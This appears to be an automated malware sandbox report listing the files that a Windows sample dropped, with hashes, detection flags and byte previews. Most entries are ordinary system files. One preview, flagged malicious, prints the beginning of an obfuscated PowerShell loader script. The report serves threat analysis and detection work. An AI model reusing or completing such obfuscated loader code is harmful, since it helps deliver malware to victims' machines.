                              Preview:MSCF............,...................O..................YWP .disallowedcert.stl.lJ..B...CK.wTS.....{.&Uz.I."E".HS@. .P.!.....*E. .DQ..... EDA.H. E..""/.s<.s.9.....&#.{~k.VV..7@......b.R....MdT..B.L..%.C......" ....%.4%..%*.B..T.d...S.....pem..$....&.q.`.+...E..C.....$.|.A.!~d.H>w%S$...QC't..;..<..R@....2. .l..?..c..A....Ew...l..K$.. ~...'......Mt^c..s.Y%..}......h......m....h.......~d...,...=ge3.....2%..(...T..!].....!C~.X..MHU.o[.z].Y...&lXG;uW.:...2!..][\/.G..]6#.I...S..#F.X.k.j.....)Nc.].t^.-l.Y...4?.b...rY....A......7.D.H\.R...s.L,.6.*|.....VQ....<.*.......... [Z....].N0LU.X........6..C\....F.....KbZ..^=.@.B..MyH...%.2.>...]..E.....sZ.f..3z.].Y.t.d$.....P...,. .~..mNZ[PL.<....d..+...l.-...b.^....6F..z.&.;D.._..c."...d..... k9....60?&..Y.v.dgu...{.....{..d=..$......@^..qA..*uJ..@W.V..eC..AV.e+21...N.{.]..]..f]..`Z.....]2.....x..f..K...t. ...e.V.U.$PV..@6W\_nsm.n.........A<.......d....@f..Z... >R..k.....8..Y....E>..2o7..........c..K7n....

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):340
                              Entropy (8bit):3.133047342265733
                              Encrypted:false
                              SSDEEP:6:kKNO+sC5+7DYUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:vsILkPlE99SCQl2DUeXJlOA
                              MD5:4DDE321792D4318AE85BB820DE0627D3
                              SHA1:6759B31A95442D83B98A06EDE8DA0B4C2DE23149
                              SHA-256:55BC64C7E681D538F7F970CC7F5F3D8518DAB8AAD67BD4A2271911E8D91EE1A9
                              SHA-512:6D453FBB19C463FF29BBDDCE555D70BC5701B13CE487ACC46AD11F107F7D583F07AFBE6346B836D3565EAB8BBBCCE5823BA9F9ECCC7463EAA7B2BB18BE640E6E
                              Malicious:false
                              Preview:p...... ..........i..c..(....................................................... ........~..MG......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):53158
                              Entropy (8bit):5.062687652912555
                              Encrypted:false
                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                              MD5:5D430F1344CE89737902AEC47C61C930
                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                              Malicious:false
                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Eksemet\inaquate.pia

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                              Category:dropped
                              Size (bytes):450005
                              Entropy (8bit):1.2479153298421555
                              Encrypted:false
                              SSDEEP:1536:5Gqj4INxXBamclWiYciYWpzOq9QhNsc3xbEzUw:3j4IpamEBWl9usc3w
                              MD5:3056B698C1950649B1C84D88B05A81BE
                              SHA1:4660B44B7301962FB449B39D095242457E57BC36
                              SHA-256:16AE9F0FE3E58D43323048BE82894E12F16A17608B575FE487C22D0EE0909F16
                              SHA-512:4432F2A36003FBDE3B56E0450CEA9C8AE500CEA8A33276F4BB75AA391F2AB273309DC846021A72D6EF15218F99E9303FDDBAACC8667E4E3BFB852DD27A43C5D5
                              Malicious:false
                              Preview:...........................................W...........................................................................................................................l......T.....................................1......................................................V..................."......................g.............................................g................%.........................^............................6F.................................................................................... ..........................k...........................+...........j................/.................c................@..................................................H..................................>../...........................k...........6......E...........\....ZS...............................................................................................\......................................o..................?.....|......n...............................e..........O..

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede\mindehjtideligheds.bas

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):342526
                              Entropy (8bit):1.2624311512278965
                              Encrypted:false
                              SSDEEP:768:O9PQagrLcVyo283wsxFu0RY0N1JDi7y1ffv/0JJq/Z9H5KM5vCnOoD2PPWyzReFO:MQbLC3wgK0iuZQDOs0xNfTBk6qxBF
                              MD5:6ADE689B571046AD96876A499FFD4823
                              SHA1:059706B7BA9927E1A956930AC34FE2D4B7213B1B
                              SHA-256:5CF49A3778180D2653A50272127C61430271011A2F6576159911151A0FB993B6
                              SHA-512:23A4628D7CD0464BC8E1AAC6B710495E5D593975432F91CDD2B486C4B34BE3C54492D438EA62B83E4B7F327AE3AB5D94C4BD7403F6307886BE35F4B60B7418A1
                              Malicious:false
                              Preview:................?........c........z..._.............L...............................g..........6.................................................................c.............l..............................................................q..............................O................................................S.......................@....0e.?..................................m....................v................o.............................6.........................B.............u..................................u....................................................................................e..................................Q..........................F........^..........................m.............................................#.........Q........................................................................................oN......................................Q.....................................................................................................

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede\panders.prl

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):359061
                              Entropy (8bit):1.2457166424004438
                              Encrypted:false
                              SSDEEP:768:MHp33julIW3oMakaZHsjAq57OSjpLa6E97t0xQwQKdRg+ruVllG7T2MI/BcO98aj:UW3arZHcvZdOyCxcUN03za2kmRb1sGT
                              MD5:A2C0821CDD9A2B5F524F22E0B15B2D37
                              SHA1:ED69EC61DCE2BB759EB79BBD2CE1CEF19E2E4230
                              SHA-256:7725A12FD4A9A40A74A392FA563D9B6473CFA0668A08C85658862463535D01A5
                              SHA-512:C8A4A55E9C963D507E7F0E6CA9F31831AB4D0A847D66EBEA3BD92936B8B370B105264AD4CACD5E54E98DDDE75BAAD8D81DF575B81D2178F05B4997A5FA8563B7
                              Malicious:false
                              Preview:........L.........m...........&............q................E.S.............................w..................................z.................F.......................................................................................w............p..v............................................E..............................................................2..G ..S..............}.................J...............................r...........................................F..............................................S........................................................................3...........................y..............................L..............................................................e..........................s..................O......./...............................q..............................................................f..............k.............................w..........................................................Y..............]................

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Miskal.Cir

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):329653
                              Entropy (8bit):7.604147316687378
                              Encrypted:false
                              SSDEEP:6144:XquqZis+z2CfsSqVgqbZfFzC5NEM0CcxEWx1LPWSd7hdp1Vi:XRRXzTktVxbdFW5T0LGWrLvdhS
                              MD5:F9F21A8DF53A1F8E3DE905F9E4963150
                              SHA1:52D0A357FE5124FCEC54D86078044E5886939474
                              SHA-256:C50625554E838FDB35C1C05BC6D69E948807762360CBA5F745300C740C12A396
                              SHA-512:81159DEF405928F57B9F1B1CC9BF64CEBCC087BEC305DDD4023C0272C5A8EC94E6F7BFFFE8D4C16FC5374956B4B4D36BA1A03F3BD4767180147138C05E6C0D92
                              Malicious:false
                              Preview:....A........#......."..666............Y.......U.........XX...........00..........JJJJJJ.............K.ddd...............-...............D..................w...K...L............gg............D.......a........................w............................2......B...___..................................................p............H.......................................................................................................""".............}}...........................((.RRR......j................)).............R.......<<.......QQQQ...............33.........3....................3...........ZZZZZ...................777.3........................................=......................4.>>>.................................xx....VV..........MMMMM....+++.k......................%......)).......DD...............................[......RRR........,,...........##.....J.............QQ........................................RR....|.............JJJ........?.....!...................1..44........

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4127), with CRLF, LF line terminators
                              Category:dropped
                              Size (bytes):72431
                              Entropy (8bit):5.165216532813141
                              Encrypted:false
                              SSDEEP:1536:2/sna+746/kSu72it+BCJRPQsrNljSAQm9h8YjLANQWLG6:FJU6MSuKi/JFQsevSjENX
                              MD5:853DBC1BD27ACC99B75EBEEAADF24B7F
                              SHA1:A12045A510EA6BD87F1318F922510B327CE785F6
                              SHA-256:ADED78AC8C05F534138AD2247D41FE187086C5156C979159CDC497BE1C95B068
                              SHA-512:FA3E938E2B5EF93AE8AB4E9D8A0621BE8D9C472BC3D4FD696F735B2D60D89749166D52BFAA31EEFA74DB434127F311871126609E791DB9F5E7BAFE251BCAD424
                              Malicious:true
                              Preview:$Laboratorieenhed=$Feinting;.....<#Ernre Ravelin Deprivationstilstandens #>..<#Wrinkleable Pantisocrat Folklore Odoriphore Marxistens Underskridendes #>..<#Innuendoing Myrmecological Kropspleje Skridtlngdes #>..<#Overtravel Exormia Attacheens #>..<#Millettia Sharpe Kriminaldommer Wilshire Magthaveren Arketypes #>..<#Highbush Tjenesteledigt Brystoperationer Gglerens Cesses #>...$Rubrikannonces = @'.Interna.antical$formi,lMRetsmidiSkibslaslicour.sM crorhi MisshiomozambinFarmerii Nuppeds KiselseBronchorKant nns,arnage=Unsa dl$EksportWFjertekeSpherecnWarata d Gri.eri.oonshicT nomet;Unlikab.TumboaefMembranuLsn ngsnhusvildc,kdernetMonologiPartikeo CanionnAwetosu Und stOI religbPillowls Hognu kChillumnAb orbei RverietSquadroe Frstegt.lagsvreForbr,gnFattiggs Aabnin Unhe it(Immoral$DebitoraDebatt nTvrformkSorteree Gro sulNerve rs nwipedeSerobionBortfile inskhrU fructn GtestaeAssorta,Blackwa$Arm,noiD H.dropkSkittlek EgenfieOvernigtOmphalea ,bcisslIsomerslRo,gerse LsagtirTetrammkSelvangnanskue

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\antibiotikummet.feo

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):431949
                              Entropy (8bit):1.2534752844673904
                              Encrypted:false
                              SSDEEP:1536:XD5XWkkXU5F3I19UybYQB/YjqudrPIF2ZwG+vn5:XD5XcXUH3dybYQ9e9ni
                              MD5:869B68360A1E23A86847C3C760305509
                              SHA1:86DCB60824720D475AC688419D65A7DED97C85B9
                              SHA-256:ED306D19437D1188D9DFBE72E23CDFD4B44CCB9092906AA24097043B5D5C3602
                              SHA-512:DDFDC40DC59967BEE331B16998250DBECD7B0AEA93CB599F8D8CF1BE5CF3280987934F7E6A1EEC42D0295158BEF4D645100765EF11C73248163BC2F992129779
                              Malicious:false
                              Preview:........I............Z...................................._...T..........................................C...*.............x.............................................T........................i........$....................[t......................................./..........[.................................................P...........................X..............................<............4.....=............._..........%..............................o.................v..............2...........................................................................;............w........*....................................................,...............................o.....8.......................................................................Y....................T.................................................................................>.........H.".....................................@...............%...8.....u...............o.....................................[...........

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\deeryard.ski

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 66520453480448.000000
                              Category:dropped
                              Size (bytes):498522
                              Entropy (8bit):1.2529825290108598
                              Encrypted:false
                              SSDEEP:1536:8RleI23UqaKxWdq82m1gQDx6LN4ACCB1I/gCk+uDs9b:8RD+Wd0m1wLN4ACuIJk
                              MD5:F021AB50CCF26EDC2E90A7EDAD6F7E7B
                              SHA1:A24D9936137E91ED846F928AC2AA741915AED1B8
                              SHA-256:1667714305BCFDD4ABC3F115251D282A4E0517954DB1A9FAC3F74EB7B8AE2014
                              SHA-512:4261905ACC2F9307BC50943856B4EE300ED8F6FF14DD14BEB8BBC37684EA5842935984330C0FA42E9BC5530F2991426A6D91B1A80B3FFA3A4469A63F945E1454
                              Malicious:false
                              Preview:..*.............I....9.....3.........................................x..................................!...............................................c..................................................................................~.....................w..........w........................................................H.........Z...3........................._............}..............5.o..................s..............................!...............................................................................................................m...............................................m....................P...h..................U................................).............p.........................T..I........d..................>............&....G..........c...................................................|...................................R...................................l..a.........f..................................................].............................

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\ejlert.del

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):349733
                              Entropy (8bit):1.2397864872646107
                              Encrypted:false
                              SSDEEP:768:rwjkYAiCysuvu8hRx0bgnXrNhXKeZNrbxiHfPx+lHTI+PNITz8bwIvGG76LkqWOq:rw0KY+z/hl8VzPBZ6iXc6d
                              MD5:E8A9F81281E8ED1DAA1A9FA98C11DA97
                              SHA1:87BB542C6175A4B51A4C8F4C35B93244B84DF88C
                              SHA-256:0333AE760111805FA8801B65D07659CE36DBDFF05BBCA40F1305238A4E9B94AC
                              SHA-512:87F3741D3EEA36C8559183F4307F7DACE6A3F39971FA813C13DA4C734038E34EF4D70F580CE9F96F0637EAE9093557159A56620FB9DFA51D6DBA882C621837BF
                              Malicious:false
                              Preview:..........?.......................X....................................j.-..................................................................Z.......................................................2....................\......................................k......................64.......N.K......3........D............................................................B...............................................................................F....................o......d...............................................3.................L....e.......Z......................................................................2...............................1..............................F.z.........................................i.......................0..........z...Q.....4..........l................................................0..............................<.........................H..................^.................$......................................................L...........

                              C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\grmmelserne.uns

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):413602
                              Entropy (8bit):1.2424037027559116
                              Encrypted:false
                              SSDEEP:1536:n3axPycbUHvtclWN2TTHn3tJqChok8dEhx:EycwHv+lWN+z3jnCfdm
                              MD5:5414789DC51920495C97F8F8CD9EAC2A
                              SHA1:69D800A2463D4B0AEB7AA656EB9037659239C9DB
                              SHA-256:D32BF488FC11B9848CB4A2CC7EDD285D90316558F626833DA0E157BE515A99B7
                              SHA-512:B58A857363EEF41D3861F2D27FEF888A418D383E3F11D4C1F80684E7996539A1A2470C86933C69446FB215D7534A0EDDE12DC85DDC2A4BCDF58009F406C7329D
                              Malicious:false
                              Preview:.......................................E................................9..............................................................................................................................................................................................................y.......................................................n.F..................................................................+-I.....7.................0...........[................................!.......................v...............l.y................................................._.........................................................................................................................b.................................................................2....................H...................................................................p.....................................t........................................~....................../...........N.........................................

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2t0zvoc.25u.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvbjfaca.010.psm1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p40vm4wu.kyy.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suspgcuk.mow.ps1

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll

                              Download File
                              Process:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):6656
                              Entropy (8bit):5.178709395875687
                              Encrypted:false
                              SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                              MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                              SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                              SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                              SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              • Antivirus: Virustotal, Detection: 0%, Browse
                              Joe Sandbox View:
                              • Filename: RzEqKuZBuK.exe, Detection: malicious, Browse
                              • Filename: RzEqKuZBuK.exe, Detection: malicious, Browse
                              • Filename: vfhlZ0vrbe.exe, Detection: malicious, Browse
                              • Filename: vfhlZ0vrbe.exe, Detection: malicious, Browse
                              • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                              • Filename: HJEbEB40vP.exe, Detection: malicious, Browse
                              • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                              • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                              • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                              • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\Logs\SIH\SIH.20250111.022207.106.1.etl

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):3.1656305928731805
                              Encrypted:false
                              SSDEEP:96:FItIUzbK9nw1I+NwZsrvnxqY6229IcxkZ+DqYcbI+SAlcJEiJLJwIQsx:FIBK9nsIQQgn0Jzaadq7bjfOEiHNQsx
                              MD5:13D71B4D5184944373F88FDD891BE962
                              SHA1:055CEF4D129D0BF49E76ACF2BB454E6925597505
                              SHA-256:92A74CC605E4DF8415B6704B2B26278F1C9886D50904343EBE0E49FB0444943D
                              SHA-512:65C695F9A8335369F45CD1D2E2FFD985C5DA32DA9C9C93FC6F7419FD3FCB64CF68D6726983521FDC782C8BE50035463C71287A11E5674A69D71019B5539DC10E
                              Malicious:false
                              Preview:....P...P.......................................P...!...........................(.......,..^....................eJ.......B...c..Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f............4C..c..........S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.5.0.1.1.1...0.2.2.2.0.7...1.0.6...1...e.t.l.......P.P.(.......,..^....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP4BCB.tmp

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):17126
                              Entropy (8bit):7.3117215578334935
                              Encrypted:false
                              SSDEEP:192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
                              MD5:1B6460EE0273E97C251F7A67F49ACDB4
                              SHA1:4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
                              SHA-256:3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
                              SHA-512:3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
                              Malicious:false
                              Preview:MSCF............D................|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM...*......z.;......t.<.o..|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A...*.H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0...*.H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...*

                              C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):24490
                              Entropy (8bit):7.629144636744632
                              Encrypted:false
                              SSDEEP:384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
                              MD5:ACD24F781C0C8F48A0BD86A0E9F2A154
                              SHA1:93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
                              SHA-256:5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
                              SHA-512:7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
                              Malicious:false
                              Preview:MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$*...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y*.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G.*..`-=.w....m..2y.....*o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

                              C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPE03C.tmp

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:modified
                              Size (bytes):19826
                              Entropy (8bit):7.454351722487538
                              Encrypted:false
                              SSDEEP:384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
                              MD5:455385A0D5098033A4C17F7B85593E6A
                              SHA1:E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
                              SHA-256:2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
                              SHA-512:104FA2DAD10520D46EB537786868515683752665757824068383DC4B9C03121B79D9F519D8842878DB02C9630D1DFE2BBC6E4D7B08AFC820E813C250B735621A
                              Malicious:false
